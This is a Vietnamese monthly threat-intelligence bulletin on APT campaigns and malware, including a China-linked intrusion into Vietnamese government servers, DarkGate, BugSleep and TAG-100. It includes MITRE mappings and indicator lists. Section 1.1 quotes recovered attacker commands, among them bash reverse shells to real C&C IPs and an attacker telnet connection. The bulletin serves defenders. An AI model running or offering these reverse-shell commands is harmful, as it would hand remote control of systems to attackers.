Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết
1 Các mối đe dọa nâng cao – Advanced Threats
1.1 Chiến dịch tấn công nhắm mục tiêu vào Việt Nam
Thông qua quá trình điều tra xử lý sự cố, đội ngũ NCS ghi nhận chiến dịch tấn công nhắm đến khu vực Việt Nam. Dựa trên các dữ liệu sau khi thu thập và phân tích, NCS nhận thấy một số trùng lặp về cách thức tấn công, công cụ cũng như cơ sở hạ tầng được sử dụng liên quan đến nhóm tấn công được hậu thuẫn bởi chính phủ Trung Quốc. Nhóm tấn công này thực hiện các chiến dịch tấn công nhắm tới các đơn vị chính phủ Việt Nam trong khoảng thời gian giữa năm 2023 trở lại đây.
Cách thức tấn công
– Thông qua khai thác lỗ hổng bảo mật trên Oracle Weblogic – CVE-2017-10271 cho phép thực thi mã từ xa, nhóm tấn công drop các webshell xuống máy chủ bị ảnh hưởng. Bên cạnh webshell tồn tại trên đĩa, nhóm tấn công cũng sử dụng thêm memshell (memory webshell) nhằm gây khó khăn trong quá trình phát hiện.
– Sau khi drop webshell, nhóm tấn công thực thi các câu lệnh và tải xuống thêm các công cụ tấn công khác với quyền là quyền của tài khoản chạy dịch vụ weblogic, kết quả điều tra cho thấy một số tiến trình độc hại sau đó cũng được thực thi bằng đặc quyền root trên máy chủ bị ảnh hưởng. Ngoài ra, đội ngũ điều tra cũng phát hiện bộ công cụ khai thác lỗ hổng trong polkit – CVE-2021- 4034 (a.k.a Pwnkit) được tải xuống và thực thi, tuy nhiên không ghi nhận việc khai thác thành công lỗ hổng này.
telnet 182.93.84.21 42131 (8088, 8291)
chmod a+x 66.elf (mettlesploit) ./66.ef bash -i >& /dev/tcp/185.14.30.135/443 0>&1 bash -i >& /dev/tcp/154.39.153.42/8888 0>&1 ping baidu.com ./bs -h 106.52.166.241 -p 12308 (blueshell) ………………………………………………………………………………………………………………………………………… |
– Để thực hiện hành vi thu thập thông tin tài khoản đăng nhập trên máy chủ nhóm tấn công sử dụng các công cụ giải mã mật khẩu weblogic và mimipenguin
– Để dò quét hệ thống, nhóm tấn công sử dụng một số công cụ opensource như Fscan, TideFinger kscan, netspy và Netouter, các công cụ này được sử dụng nhằm hỗ trợ cho quá trình dò quét cổng (port), dịch vụ và scan một số lỗ hổng. Các công cụ khác hỗ trợ tunnel, proxy bao gồm Frp, Stowaway, rsocks, ew
– Để tạo các kết nối tới máy chủ C&C, nhóm tấn công sử dụng các tệp tin mã độc bao gồm Cobaltstrike, Blueshell, Xnote, Mettlesploit, SprankRAT và biến thể của Gh0stRAT. Các C&C phân tích được đều ghi nhận thuộc các chiến dịch tấn công từ các Threat Actor Trung Quốc.
Thông tin chi xem tại Chiến dịch tấn công nghi ngờ đến từ nhóm tấn công Trung Quốc nhắm tới các tổ chức tại Việt Nam
MITRE ATT&CK
Tactics | Techniques | Description |
Initial Access | [T1190] Exploit Public-Facing Application | Khai thác lỗ hổng CVE-2017-10271 cho phép thực thi mã tùy ý, drop các file độc hại |
Execution | [T1059.004] Command and Scripting Interpreter: Unix Shell | Kẻ tấn công sử dụng /bin/bash và /bin/sh để thực thi câu lệnh |
[T1059.006] Command and Scripting Interpreter: Python | Kẻ tấn công sử dụng Python để tạo reverse shell | |
Persistence | [T1505.003] Server Software Component: Web Shell | Kẻ tấn công thực hiện upload webshell |
Privilege Escalation | [T1068] Exploitation for Privilege Escalation | Khai thác lỗ hổng CVE-2021-4034 (Pwnkit) để leo thang đặc quyền lên root, tuy nhiên kết quả điều tra ghi nhận khai thác không thành công |
[T1078.001] Valid Accounts: Default Accounts | Qua điều tra cho thấy kẻ tấn công có khả năng chiếm được tài khoản root thông qua mật khẩu yếu | |
Credential Access | [T1003.007] OS Credential Dumping: Proc Filesystem | Kẻ tấn công sử dụng mimipenguin để thu thập thông tin xác thực từ máy nạn nhân |
[T1212] Exploitation for Credential Access | Kẻ tấn công sử dụng công cụ giải mã mật khẩu weblogic | |
Discovery | [T1049] System Network Connections Discovery | Thực thi các công cụ trong quá trình dò quét |
Command and Control | [T1572] Protocol Tunneling | Kẻ tấn công sử dụng công cụ hỗ trợ tunnel và proxy |
[T1090] Proxy |
Indicator of Compromises (IoCs)
Tên File | Hash (SHA1) | Mô tả |
111 | 3722fb3d417bb4d08d4eed211fd1de237be5a94d | Pwnkit |
traditional | 52400d1432fa38582f529bf38286f76546d32664 | netcat |
356 | 39575c89f37ac1ae45bed734059bc7bca925f805 | SparkRAT |
s4 | f4866030cb84292cf493c4065712668478005f52 | fscan |
Fscan | dc26aa1f01a3cb7c2ad487982efbcfe378d9acc6 | |
fscan32 | 5b0053f30a6572b422fd723997edd8bbc6210386 | |
A | 3b1329e81739b1ea6acbb4ec4dff11f02ff42570 | fscan |
Ac | 3619c46f888b03d3c12379cb901877fb8880da20 | EarthWorm |
bJrEOb | daf915ca672e0100f0a9dd87f8194972d468f2d2 | Java archive – memshell |
L84RlS | d15f383a76ca01a93ee768da156cc1b31e0ff4ba | Java archive – memshell |
Bs | 36cff870bad8009dadc399d14b41abb3afa3a341 | blueshell |
linpeas.sh | 7895f22df1ad0b154a9bf6da8d7479ca38f3afec | |
3.elf | f318463ec539069fd388544dadf2efe9a128ec11 | mettlesploit |
66.elf | 63858b2248b65b1d071b6540e591622c5ba119f4 | mettlesploit |
K | 57a26be3e175fe41fd2581cb7d9c95c7f0b14cf4 | kscan |
L | 8138eba6398650bdbf0c9483515fa5766ef3427a | Stowaway |
mimi.sh | a0267324300e453a55c727e7c9e20ba419e86260 | mimipenguin.sh |
Netspy | 8c36cd8efd722d03bf60a03e0cde2837f1190b92 | netspy |
Pki | a1d89a0e22a522c062d8f7c3b70a7ef1465d1c88 | SparkRAT |
ew_for_l | 3619c46f888b03d3c12379cb901877fb8880da20 | EarthWorm |
NetOuter | 368548d180c2e402dd1f3a53f7b46f71df3c9872 | NetOuter |
f64 | 7dbb1c0e421a49bad2a8dd867a1188df10c5f458 | |
Bktest | 0b597560096064577282024a77c693da8eccb0bf | |
he1p | b0775d0f4e259fcfb336e9d1b1d45941c00be941 | |
CCCCCCCC | 1afd03b91e73db0de7685af473530503bc9257ff | variant Gh0stcat |
cve-2021-4034.sh | 636089FA2CACE9CC33F482D348E9DE8CB5CFC571 | |
TideFinger | 7DD9B575C0DCED8A0D7E22635220A18B601519D2 | |
iptable6 | eac13a0d88cc0d5fa1d9ebbbaa91c26fcbb962de | Xnote |
Frpc | DE9FE0334E9E91F43C498519CDD8DDB010441F3F | fast reverse proxy |
s5c.py | 1563351B8AC708F6BE33083C9A84FC5857363255 | Reprocks – python socks5 proxy |
Fr | ea10b9f49549286f27df24221e0d485c103a9c33 | rsocks |
tide.jsp | 2bafd82920b3de79303fda881bdac8c16f55b98a | webshell |
optdir.jsp | ef6f4561fecd17bc55534a3b96cecb4032b786c5 | |
gsl.jsp | 06c929038ddac1dbc5afa0d639fa770b88307870 | |
test11.jsp | c8e64e779c5dc2144a0ce47e56901abf42c20ae2 | |
test22.jsp | dfee8b38296870c42d4be2684cb60168269f108b | |
Login.jsp | 386321c7c345695f3061cdc9e87f649733470e5e | |
config1.jsp | ace8e049b5b4eb8f953a22549e7d5e8a4fb1eae6 | |
index.jspx | dc653db41dd07cd1642e7b1184351364f9f85483 | |
random.jsp | d4887f9df935e081796d08c00c31e2a65e05ae81 | |
1.jsp | 2dc7dec15ff62d7fdf62b1ead4569b091b9eec15 | |
2.jsp | 2dc7dec15ff62d7fdf62b1ead4569b091b9eec15 | |
cc.jsp | 571f21f28f92c0a4abad9491b0ebccbd4b37e3cd | |
n6eHIZ1.jsp | dfcda2b286613ee10b62ea36a98f894fdf5f9fe9 | |
n6eHIZ2.jsp | 8390d75807d001d039bf5ad5444b93f916f1ba57 | |
t111.jsp | ef2efba2f9a2a7a8e49004b8faa01b981bf8e3d1 | |
test33.jsp | c0782245dcb91a864924e730d77f29906003147c | |
Login.jsp | 386321c7c345695f3061cdc9e87f649733470e5e | |
index.jsp | 236c55ec9cb602bea610434dc4f7752a491795bb | |
1deW3i.jsp | 571a6796900888f32390008cd7e910ea4eb40193 | |
2deW3i.jsp | 6e56d6d6e41fe7fd9eb328453266f58ba8d1ba7f | |
3deW3i.jsp | 6b37ea71078e47be7eff16ede3257ab74692ed43 | |
MD18.jsp | b727eb2545c19536a8d42ff7279e47939cf3a9bc | |
S8n1.jsp | 0428a952e21101e3d4689d4439fdaa8c877ab097 | |
bakup.jsp | 2bd37f45fa552b0cabd07b58bbe2c9f8216eefe9 | |
bd1W.jsp | 5b4c741ec955ce3397ee0c57f07bff8ffd98c885 | |
bdD1W.jsp | a618121978ba1024dbddcfc39d60db267a0ed0fc | |
cbc.jsp | d7c5e3077010fb37092f6dedadc0616ae655724b | |
config_api.jsp | f0f74f11ff116954a68222553f8235c85b2218a1 | |
deW3i.jsp | 571a6796900888f32390008cd7e910ea4eb40193 | |
gsl.jsp | dd8ca78353638d275f36d864a79e8ac8b3a1eb17 | |
images.jsp | 26458d5ee84546db4d1b5aa87b2fe7ff2d620999 | |
info.jsp | e6c9730968b77116dbe1507b4a772357f61cbd97 | |
ini.jsp | e9da007db5059096936f06eac5aea16d17448a07 | |
opt.jsp | 39ff1d7667b74477334b9d80472021b44c7e8abe | |
optdir.jsp | 39ff1d7667b74477334b9d80472021b44c7e8abe | |
pk.jsp | 67b590af8d78547a03683e0cc314970d27de0305 |
C&C:
106[.]52.166[.]241
45[.]77.174[.]174:80
38[.]54.119[.]156:18080
b[.]niupilao[.]vip:80
185[.]14.30[.]135
154[.]39.153[.]42
175[.]178.0[.]20
Suspicious IP:
182.93.84.21
183.93.84.21
54.39.248.121
154.39.248.121
206.189.244.183
64.176.85.105
Danh sách các IP truy cập webshell:
156.146.56.138
89.187.163.211
89.187.163.135
156.146.56.136
138.199.60.185
89.187.162.185
89.187.163.216
89.187.163.142
103.216.223.206
89.187.163.201
156.146.56.133
149.34.253.147
89.187.163.198
146.70.192.110
89.164.99.137
85.10.51.92
85.10.56.191
176.222.34.133
85.10.56.228
89.187.163.206
176.222.34.122
89.187.163.203
156.146.56.133
89.187.163.218
149.34.253.149
103.216.223.204
89.187.163.131
89.187.163.135
89.187.163.196
89.187.162.187
89.187.163.206
138.199.60.187
146.70.192.110
89.187.163.213
210.56.55.53
85.10.56.191
176.222.34.133
85.10.56.228
85.10.51.92
89.164.99.137
54.255.35.159
209.146.30.250
8.213.196.159
45.154.12.215
107.172.140.33
104.243.17.81
149.154.161.201
103.186.117.224
165.22.243.96
122.100.249.253
103.45.64.232
38.94.109.209
149.154.161.204
149.154.161.246
124.105.3.211
3.39.225.57
149.154.161.199
149.154.161.219
176.222.34.122
1.2 Chiến dịch tấn công thông qua lỗ hổng zero-day nhắm mục tiêu tới khu vực Bắc Mỹ, Châu Âu và Đông Nam Á
Gần đây, các nhà nghiên cứu của TrendMicro đã phát hiện ra nhóm APT Void Banshee thực hiện tấn công thông qua lỗ hổng zeroday nhằm triển khai Atlantida stealer, nhắm mục tiêu vào khu vực Bắc Mỹ, Châu Âu và Đông Nam Á nhằm đánh cắp thông tin và mục đích tài chính. Atlantida Stealer được phát hiện lần đầu vào tháng 01/2024, các biến thể được sử dụng trong suốt 2024, sử dụng lỗ hổng CVE-2024-38112 như một phần trong quá trình tấn công.
Nhóm tấn công cũng sử dụng các tệp zip chứa các bản sao của các cuốn sách dưới dạng pdf, những file độc hại này cũng chia sẻ trên các thư viện trực tuyến, cloud, Discord hay 1 số trang web khác. Thông tin 1 file pdf bao gồm sách giáo khoa và tài liệu tham khảo có tên Clinical Anatomy, cho thấy mục tiêu được nhắm đến là những sinh viên có trình độ cao, những người thường sử dụng tài liệu tham khảo… Kẻ tấn công đã thay đổi biểu tượng mặc định của internet shortcut file (.url) thành .pdf nhằm lừa người dùng thực thi file độc hại
Một tệp url độc hại giả mạo dưới file pdf của một cuốn sách được phát hiện có tên “Books_A0UJKO.pdf.url”
Để khai thác lỗ hổng CVE-2024-38112, kẻ tấn công cần cấu hình trong file định dạng .LNK với trường URL trỏ đến đường dẫn do kẻ tấn công kiểm soát, như ghi nhận trong chiến dịch kẻ tấn công cấu hình tải xuống tệp tin với đuôi .hta. Bên trong sẽ chứa các đoạn mã thực thi VBScript, VBScript sẽ tải xuống và chạy một tập lệnh PowerShell có nhiệm vụ truy xuất .NET trojan loader, sử dụng Donut shellcode nhằm decrypt và thực thi Atlantida stealer trong bộ nhớ.
Atlantida là payload cuối cùng trong chuỗi lây nhiễm, được phát triển dựa trên các mã nguồn mở NecroStealer và PredatorTheStealer, mã độc có nhiệm vụ trích xuất tệp tin, ảnh chụp màn hình, vị trí địa lý (bao gồm địa chỉ IP, quốc gia, mã bưu chính), thông tin nhạy cảm từ trình duyệt web và các ứng dụng khác nhau bao gồm: Telegram, Steam, FileZilla,v.v… và gửi dữ liệu này tới C&C server.
Indicator of Compromise (IoCs)
SHA-256 HASHES
c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae Internet shortcut
d8824f643127c1d8f73028be01363fd77b2ecb050ebe8c17793633b9879d20eb HTML downloader
87480b151e465b73151220533c965f3a77046138f079ca3ceb961a7d5fee9a33 HTA downloader
c85eedd51dced48b3764c2d5bdb8febefe4210a2d9611e0fb14ffc937b80e302 PowerShell downloader
13907caae48ea741942bce60fa32087328475bd14f5a81a6d04d82286bd28b4d .NET trojan downloader
119b0994bcf9c9494ce44f896b7ff4a489b62f31706be2cb6e4a9338b63cdfdb Donut downloader
6f1f3415c3e52dcdbb012f412aef7b9744786b2d4a1b850f1f4561048716c750 Atlantida stealer
b371fbdce6935039218d4b4272db3521881c9cec48ef82dec1e9e0188a32d3ad Internet shortcut
URLs
hxxps[://]fullgasesspa[.]cl/tet/download[.]php
hxxp[://]cbmelipilla[.]cl/te/test1[.]html
hxxps[://]cbmelipilla[.]cl/te/hhhh2[.]php
hxxps[://]hostalaskapatagonia[.]com/tt/tedfd[.]te
hxxps[://]hostalaskapatagonia[.]com/tt/become[.]txt
hxxp[://]h[.]com:8000/test1[.]html
C&C
185[.]172[.]128[.]95
1.3 Kẻ tấn công nhắm vào các tổ chức chính phủ toàn cầu trong đó có Châu Á-Thái Bình Dương.
Kẻ tấn công chưa từng được biết trước đây sử dụng backdoor Pantegana (một opensource về mã độc được phát triển bằng ngôn ngữ Golang) nhắm vào tổ chức chính phủ và tổ chức tư nhân toàn cầu, được theo dõi tạm thời với tên TAG-100. Kẻ tấn công đã xâm phạm tổ chức ít nhất 10 quốc gia trên khắp Châu Phi, Châu Á, Bắc Mỹ, Nam Mỹ, Châu Đại Dương bao gồm 2 tổ chức liên chính phủ Châu Á-Thái Bình Dương. Kể từ tháng 2/2024, Insikt Group đã xác định một số tổ chức có thể là nạn nhân tại một số khu vực như Cambodia, Djibouti, Cộng hòa Dominica, Fiji, Indonesia, Hà Lan, Đài Loan, Vương quốc Anh, Hoa Kỳ và Việt Nam. Ngoài ra, nạn nhân bao gồm các hiệp hội thương mại công nghiệp, cũng như chính phủ, liên chính phủ, ngoại giao, chính trị, tổ chức phi lợi nhuận, tôn giáo, bao gồm:
- Các tổ chức liên chính phủ có trụ sở tại Đông Nam Á và Châu Đại Dương
- Bộ Ngoại giao các nước Đông Nam Á, Nam Mỹ và Caribe
- Đại sứ quán của một quốc gia Tây Nam Á tại Hoa Kỳ
- Nhiều tổ chức tôn giáo ở Hoa Kỳ và Đài Loan
- Hiệp hội thương mại ngành tài chính có trụ sở tại Hoa Kỳ
- Công ty lắp ráp và thử nghiệm chất bán dẫn của Đài Loan
Kẻ tấn công nhắm mục tiêu khai thác đến các thiết bị Citrix NetScaler, F5 BIG-IP, Zimbra, Microsoft Exchange Server, SonicWall, Cisco Adaptive Security Appliances (ASA), Palo Alto Networks GlobalProtect, và Fortinet FortiGate. Ngoài ra, TAG-100 cũng sử dụng Pantegana, SparkRAT, LESLIELOADER, Cobalt Strike, và CrossC2
Indicator of Compromise (IoCs)
TAG-100 C2 Infrastructure
IP Address
209.141.46[.]83
209.141.57[.]75
205.185.126[.]208
38.54.115[.]34
209.141.42[.]131
104.244.79[.]119
207.246.108[.]119
38.54.15[.]164
198.98.49[.]41
209.141.50[.]215
205.185.127[.]12
209.141.50[.]215
45.32.107[.[53
205.185.117[.]73
216.238.68[.]36
209.141.37[.]217
205.185.121[.]169
144.202.125[.]201
173.254.229[.]93
TAG-100 Exploitation Servers
IP Address
205.185.122[.]35
209.141.47[.]6
TAG-100 Cobalt Strike C2 Domain
www.megtech[.]xyz
Pantegana Self-signed TLS Certificate Fingerprint
9b6bc9e7ed924900e5dfb8df2ac0916fbe6913a7717c341152f5c17ae017278c
Cobalt Strike Samples (SHA256)
e3aab908800cb4601bc4a87ac9ac48d816ced57cdb409b6e2468956cc50bdf04
8eb3617768ce4693b726bb8187e5cccea3359de0196d6f2bbe555c31f12d1234
SparkRAT/LESLIELOADER Samples (SHA256)
23efecc03506a9428175546a4b7d40c8a943c252110e83dec132c6a5db8c4dd6
ec45da0ca70a9b71652cc95d51665f7ad568294bd5652c395a119bccd613e9b4
b8cab11421eb4731c16cf3c34ca2b3f2a758d5e112f877b90a18b3e146c8add0
1.4 DarkGate – được phát tán thông qua Microsoft Excel.
Kể từ tháng 3 đến tháng 4/2024, nhóm tấn công sử dụng file Microsoft Excel nhằm download các tệp tin độc hại từ một dịch vụ chia sẻ tệp tin thông qua SMB – Samba. Mục tiêu ban đầu nhắm vào Bắc Mỹ nhưng sau đó phát triển sang Châu Âu và một số khu vực Châu Á. DarkGate được phát hiện lần đầu tiên vào 2018, phát triển thành malware-as-a-service (MaaS), đi kèm với khả năng điều khiển các máy chủ từ xa, thực thi mã độc, khai thác tiền điện tử, khởi chạy các reverse shell và drop payloads.
Bắt đầu bằng việc mở tệp Microsoft Excel (.xlsx), yêu cầu người dùng click vào button “Open”, sau khi click sẽ tải xuống và thực thi VBScripts được lưu trên Samba.
file:///\\167[.]99.115[.]33\share\EXCEL_OPEN_DOCUMENT.vbs
file:///\\5.180[.]24[.]155\azure\EXCEL_DOCUMENT_OPEN.JS………. |
Nội dung trong EXCEL_OPEN_DOCUMENT.vbs chứa đoạn mã nhằm khởi chạy powershell, với các tệp tin Excel sử dụng .js, các đoạn code js cũng thực hiện hành động tương tự, khởi chạy các câu lệnh powershell
Đoạn mã PowerShell có nhiệm vụ tải xuống 3 tệp tin được sử dụng để triển khai DarkGate dựa trên AutoHotKey. Ở một số mẫu khác, đoạn mã powershell thực hiện kiểm tra các phần mềm AV Kaspersky có được cài đặt hay không để tải xuống AutoHotKey.exe hợp lệ, các kỹ thuật này cũng được ghi nhận tương tự với các đoạn mã trong AutoHotKey ( .ahk ) và AutoIt3 ( .au3 hoặc .a3x ). test.txt là payload cuối cùng, sẽ được giải mã thông qua script .ahk và load vào bộ nhớ để khởi chạy DarkGate
DarkGate hoạt động bằng cách quét các anti-malware khác nhau và kiểm tra thông tin CPU để xác định xem chương trình đó đang chạy trên môi trường máy ảo (virtual machine) hay không. Ngoài ra, DarkGate còn kiểm tra các quy trình đang chạy của máy chủ để xác định các reverse engineering tools, debuggers hay virtualization software. Việc xác định các quy trình này giúp DarkGate thực hiện hành động thích hợp để tránh phát hiện.
Indicator of Compromises (IoCs)
SHA256 Hash | File Description |
378b000edf3bfe114e1b7ba8045371080a256825f25faaea364cf57fa6d898d7 | XLSX file containing embedded object pointing to SMB URL hosting JS file |
ba8f84fdc1678e133ad265e357e99dba7031872371d444e84d6a47a022914de9 | XLSX file containing embedded object pointing to SMB URL hosting VBS file |
a01672db8b14a2018f760258cf3ba80cda6a19febbff8db29555f46592aedea6 | XLSX file containing embedded object pointing to SMB URL hosting VBS file |
02acf78048776cd52064a0adf3f7a061afb7418b3da21b793960de8a258faf29 | XLSX file containing embedded object pointing to SMB URL hosting VBS file |
2384abde79fae57568039ae33014184626a54409e38dee3cfb97c58c7f159e32 | XLSX file containing embedded object pointing to SMB URL hosting VBS file |
4b45b01bedd0140ced78e879d1c9081cecc4dd124dcf10ffcd3e015454501503 | XLSX file containing embedded object pointing to SMB URL hosting VBS file |
08d606e87da9ec45d257fcfc1b5ea169b582d79376626672813b964574709cba | XLSX file containing embedded object pointing to SMB URL hosting VBS file |
4b45b01bedd0140ced78e879d1c9081cecc4dd124dcf10ffcd3e015454501503 | XLSX file containing embedded object pointing to SMB URL hosting VBS file |
08d606e87da9ec45d257fcfc1b5ea169b582d79376626672813b964574709cba | XLSX file containing embedded object pointing to SMB URL hosting VBS file |
585e52757fe9d54a97ec67f4b2d82d81a547ec1bd402d609749ba10a24c9af53 | XLSX file containing embedded object pointing to SMB URL hosting JS file |
51f1d5d41e5f5f17084d390e026551bc4e9a001aeb04995aff1c3a8dbf2d2ff3 | XLSX file containing embedded object pointing to SMB URL hosting JS file |
44a54797ca1ee9c896ce95d78b24d6b710c2d4bcb6f0bcdc80cd79ab95f1f096 | XLSX file containing embedded object pointing to SMB URL hosting JS file |
b28473a7e5281f63fd25b3cb75f4e3346112af6ae5de44e978d6cf2aac1538c1 | XLSX file containing embedded object pointing to SMB URL hosting JS file |
Examples of SHA256 hashes for JS or VBS files used for DarkGate infections:
- 96e22fa78d6f5124722fe20850c63e9d1c1f38c658146715b4fb071112c7db13
- F9d8b85fac10f088ebbccb7fe49274a263ca120486bceab6e6009ea072cb99c0
- 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
Examples of SHA256 hashes for PowerShell scripts used for DarkGate infections:
- 9b2be97c2950391d9c16497d4362e0feb5e88bfe4994f6d31b4fda7769b1c780
- 9a2a855b4ce30678d06a97f7e9f4edbd607f286d2a6ea1dde0a1c55a4512bb29
- 51ab25a9a403547ec6ac5c095d904d6bc91856557049b5739457367d17e831a7
- b4156c2cd85285a2cb12dd208fcecb5d88820816b6371501e53cb47b4fe376fd
SHA256 hash for copy of AutoHotKey EXE used for these infections (not malicious):
- 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
Examples the URLs used to retrieve and run AutoHotKey packages for DarkGate malware:
March 12, 2024:
- hxxp://adfhjadfbjadbfjkhad44jka[.]com/aa
- hxxp://adfhjadfbjadbfjkhad44jka[.]com/xxhhodrq
- hxxp://adfhjadfbjadbfjkhad44jka[.]com/zanmjtvh
March 13, 2024:
- hxxp://nextroundst[.]com/aa
- hxxp://nextroundst[.]com/ffcxlohx
- hxxp://nextroundst[.]com/nlcsphze
March 15, 2024:
- hxxp://diveupdown[.]com/aa
- hxxp://diveupdown[.]com/aaa
- hxxp://diveupdown[.]com/hlsxaifp
- hxxp://diveupdown[.]com/yhmrmmgc
2 Malware
2.1 Phân tích BUGSLEEP Backdoor
Các nhà nghiên cứu CheckPoint gần đây ghi nhận mã độc backdoor mới chưa từng mô tả trước đây có tên gọi BugSleep. Mã độc được thiết kế với mục đích chuyển các tệp tin giữa máy nạn nhân tới máy chủ C&C và vẫn đang được tiếp tục phát triển, thông qua các chiến dịch phishing từ các tài khoản email của các tổ chức bị chiếm quyền điều khiển. Chiến dịch của nhóm tấn công ghi nhận hơn 50 email lừa đảo nhắm tới nhiều lĩnh vực tại Israel với nội dung là các lời mời tham gia hội thảo (webinars) hoặc các khóa học online. Quá trình triển khai mã độc sẽ qua nhiều stage như hình ảnh mô tả dưới đây
BugSleep được phát triển và triển khai để có thể thay thế cho việc sử dụng công cụ RMM, nhóm nghiên cứu ghi nhận nhiều phiên bản khác nhau với các cải tiến và sửa lỗi, tuy nhiên logic của các phiên bản của BugSleep là vẫn tương tự nhau, với việc lẩn tránh việc phát hiện trong môi trường sandbox thông qua Sleep API và load các hàm cần thiết khi thực thi. Trong các mẫu thu thập được ghi nhận mã độc tạo mutex có tên PackageManager hoặc DocumentUpdater, giải mã cấu hình C&C server bao gồm địa chỉ IP và cổng (port), các cấu hình này được mã hóa theo cách mỗi bytes sẽ trừ đi một giá trị được cấu hình trước đó trong code, cách thức mã hóa này ghi nhận ở hầu hết các samples. Mã độc tạo scheduled task cùng tên với mutex, cấu hình thực thi hàng ngày sau mỗi 30 phút
Giao tiếp với C&C cũng sẽ được mã hóa và tuân theo định dạng chung như sau: [size_of_data][data] bắt đầu với việc gửi ID của nạn nhân, bao gồm tên máy tính và theo sau là tên người dùng theo định dạng [computer_name][username].
BugSleep cũng hỗ trợ command để thực thi các câu lệnh được gửi từ C&C
Command | Tham số | Mô tả |
1 | Tên tệp tin | Gửi nội dung tệp tin C&C. |
2 | Tên tệp tin | Viết nội dung vào tệp tin. |
3 | Command | Thực thi câu lệnh thông qua pipe |
4 | Timeout value | Cập nhật giá trị ‘receive timeout’. |
6 | – | Ngừng giao tiếp giữa BugSleep và C&C. |
9 | – | Xóa lập lịch. |
10 | – | Kiểm tra trạng thái của lập lịch. |
11 | – | Tạo lập lịch. |
97 | Sleep time | Cập nhật sleep time (không có command này ở các phiên bản đầu tiên). |
98 | Timeout value | Cập nhật receive timeout (không có command này ở các phiên bản đầu tiên). |
99 | – | type of ping. |
Ở một số phiên bản, mã độc cũng triển khai một số phương pháp nhằm tránh sự phát hiện của các giải pháp EDR thông qua ProcessDynamicCodePolicy
Một số phiên bản khác, mã độc sẽ đi kèm các custom loader, loader làm nhiệm vụ inject shellcode BugSleep vào bộ nhớ của một trong số các tiến trình sau: msedge.exe, opera.exe, chrome.exe, anydesk.exe, Ondedrive.exe, powershell.exe thông qua API WriteProcessMemory và CreateRemoteThread.
Indicator of Compromises (IoCs)
Domains:
kinneretacil.egnyte[.]com
salary.egnyte[.]com
gcare.egnyte[.]com
rimonnet.egnyte[.]com
alltrans.egnyte[.]com
megolan.egnyte[.]com
bgu.egnyte[.]com
fbcsoft.egnyte[.]com
cnsmportal.egnyte[.]com
alkan.egnyte[.]com
getter.egnyte[.]com
ksa1.egnyte[.]com
filecloud.egnyte[.]com
nour.egnyte[.]com
airpazfly.egnyte[.]com
cairoairport.egnyte[.]com
silbermintz1.egnyte[.]com
smartcloudcompany[.]com
onlinemailerservices[.]com
smtpcloudapp[.]com
softwarehosts[.]com
airpaz.egnyte[.]com
airpazflys.egnyte[.]com
fileuploadcloud.egnyte[.]com
downloadfile.egnyte[.]com
URLs:
https://shorturl[.]at/NCxJk
https://shorturl[.]at/bYqUx
https://ws.onehub[.]com/files/bbmiio1c
https://ws.onehub[.]com/files/zgov9aqy
C&C:
146.19.143[.]14
91.235.234[.]202
85.239.61[.]97
Other:
95.164.32[.]69
5.252.23[.]52
194.4.50[.]133
193.109.120[.]59
IP address được sử dụng để gửi các emails phishing:
89.221.225[.]81
45.150.108[.]198
200.200.200[.]248
169.150.227[.]230
169.150.227[.]205
185.248.85[.]20
141.98.252[.]143
31.171.154[.]54
146.70.172[.]227
198.54.131[.]36
File
BugSleep:
73c677dd3b264e7eb80e26e78ac9df1dba30915b5ce3b1bc1c83db52b9c6b30e
960d4c9e79e751be6cad470e4f8e1d3a2b11f76f47597df8619ae41c96ba5809
b8703744744555ad841f922995cef5dbca11da22565195d05529f5f9095fbfca
94278fa01900fdbfb58d2e373895c045c69c01915edc5349cd6f3e5b7130c472
5df724c220aed7b4878a2a557502a5cefee736406e25ca48ca11a70608f3a1c0
RMM MSI:
39da7cc7c627ea4c46f75bcec79e5669236e6b43657dcad099e1b9214527670e
c23f17b92b13464a570f737a86c0960d5106868aaa5eac2f2bac573c3314eb0f
fb58c54a6d0ed24e85b213f0c487f8df05e421d7b07bd2bece3a925a855be93a
7e6b04e17ae273700cef4dc08349af949dbd4d3418159d607529ae31285e18f7
ff2ae62ba88e7068fa142bbe67d7b9398e8ae737a43cf36ace1fcf809776c909
e2810cca5d4b74e0fe04591743e67da483a053a8b06f3ef4a41bdabee9c48cf7
90f94d98386c179a1b98a1f082b0c7487b22403d8d5eb3db6828725d14392ded
20aaeac4dbea89b50d011e9becdf51afc1a1a1f254a5f494b80c108fd3c7f61a
55af6a90ac8863f27b3fcaa416a0f1e4ff02fb42aa46a7274c6b76aa000aacc2
f925d929602c9bae0a879bb54b08f5f387d908d4766506c880c5d29986320cf9
Archives:
424a9c85f97aa1aece9480bd658266c366a60ff1d62c31b87ddc15a1913c10e4
c80c8dd7be3ccf18e327355b880afb5a24d5a0596939458fb13319e05c4d43e9
c88453178f5f6aaab0cab2e126b0db27b25a5cfe6905914cc430f6f100b7675c
31591fcf677a2da2834d2cc99a00ab500918b53900318f6b19ea708eba2b38ab
a0968e820bbc5e099efd55143028b1997fd728d923c19af03a1ccec34ce73d9b
88788208316a6cf4025dbabbef703f51d77d475dc735bf826b8d4a13bbd6a3ee
4064e4bb9a4254948047858301f2b75e276a878321b0cc02710e1738b42548ca
e7896ccb82ae35e1ee5949b187839faab0b51221d510b25882bbe711e57c16d2
1c0947258ddb608c879333c941f0738a7f279bc14630f2c8877b82b8046acf91
8fbd374d4659efdc5b5a57ff4168236aeaab6dae4af6b92d99ac28e05f04e5c1
7e14ca8cb7980e85aff4038f489442eace33530fd02e2b9c382a4b6907601bee
02060a9ea0d0709e478e2fba6e9b71c1b7315356acc4f64e40802185c4f42f1c
53b4a4359757e7f4e83929fba459677e76340cbec7e2e1588bbf70a4df7b0e97
0ab2b0a2c46d14593fe900e7c9ce5370c9cfbf6927c8adb5812c797a25b7f955
2.2 Phân tích GootLoader
Năm 2020, TrendMicro phát hiện và ghi nhận loại phần mềm độc hại viết bằng ngôn ngữ JavaScript có tên là Gootkit Loader, một biến thể của Gookit được phát hiện lần đầu vào 2014. Mã độc được phát tán và phân phối thông qua các bài đăng trên các diễn đàn giả mạo. Gần đây, vẫn ghi nhận nhóm tấn công sử dụng lại các chiến thuật – kỹ thuật tấn công sử dụng các bài đăng trên các diễn đàn giả mạo nhằm phát tán mã độc
